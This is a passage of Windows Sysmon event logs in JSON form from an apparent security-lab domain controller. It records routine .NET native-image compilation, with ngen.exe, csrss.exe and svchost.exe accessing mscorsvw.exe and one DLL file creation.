07:03:36.232","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C8-5F25-0000-0010BECC1100}","TargetProcessId":"3616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9133,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.232\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C8-5F25-0000-0010BECC1100}\r\nTargetProcessId: 3616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.232","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C8-5F25-0000-0010BECC1100}","TargetProcessId":"3616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9134,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.232\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C8-5F25-0000-0010BECC1100}\r\nTargetProcessId: 3616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.232","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C8-5F25-0000-0010BECC1100}","TargetProcessId":"3616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9135,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.466\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A0-5F25-0000-001033991000}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.466","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A0-5F25-0000-001033991000}","TargetProcessId":"2512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9136,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.466\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A0-5F25-0000-001033991000}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.466","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A0-5F25-0000-001033991000}","TargetProcessId":"2512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9137,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.466\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A0-5F25-0000-001033991000}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.466","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A0-5F25-0000-001033991000}","TargetProcessId":"2512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9138,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:36.591\r\nProcessGuid: {E2A3D6B1-13C8-5F25-0000-001068D01100}\r\nProcessId: 2512\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\9d0-0\\System.Configuration.Install.dll\r\nCreationUtcTime: 2020-08-01 07:03:36.591","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:36.591","ProcessGuid":"{E2A3D6B1-13C8-5F25-0000-001068D01100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\9d0-0\\System.Configuration.Install.dll","CreationUtcTime":"2020-08-01 07:03:36.591","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9139,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.622\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C8-5F25-0000-001001D51100}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.622","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C8-5F25-0000-001001D51100}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9140,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.622\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C8-5F25-0000-001001D51100}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.622","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C8-5F25-0000-001001D51100}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
